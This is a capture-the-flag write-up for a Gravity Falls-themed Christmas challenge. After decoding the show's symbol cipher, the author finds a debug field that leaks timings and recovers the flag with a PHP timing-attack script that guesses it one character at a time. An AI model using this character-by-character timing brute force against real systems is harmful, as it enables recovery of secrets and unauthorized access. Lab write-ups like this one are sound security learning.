Challenge: Santa visited a Gravity Falls town. While visiting, he met a triangular man called Bill, who stole his gifts. To get them back, he must decode some strange hieroglyphics symbols. Help him do it and save Christmas!
The flag contains only printable characters.
This was another fun one. I saw it before the challenge was open, but due to a completely non-christmas theme, I dismissed it as something else.
We are greeted by some sort of freemason triangle and some strange symbols.
Gravity Falls is a cartoon, eh, pardon, animated series. I have seen it before, but did not make the association right away. Googling around for it we find the “decoder ring” needed to translate the symbols to text.
This takes us to the next stage. We are left with just the input field. Now what?
Looking at the source, we see a hint:
After a bit of trial an error we see that if we set the debug POST field we get some sort of timings back:
After some more experimentation we see that the time difference between start and end is different for some characters we send. So for x we get a delay of 0.1 second or more where as of some others we get less than 0.01 seconds.
At this point it was quite obvious that this resembles a “timing” attack, where the correct prefix would produce different processing time than a wrong one.
I made a script that would post different characters, scrape the output and build the string depending on the value received.
$str = "xmas{";
function flag($str) {
for ($i=32;$i<=126;$i++) {
$c = $str . chr($i);
usleep(5000);
$d = get($c);
if ($d>0.05) {
echo $c."\n";
flag($c);
}
}
}
flag($str);
And the output.
Flag: xmas{S@nTa_Chr1Stm@s_G1ftS}
What did I learn: Watching cartoons is important!
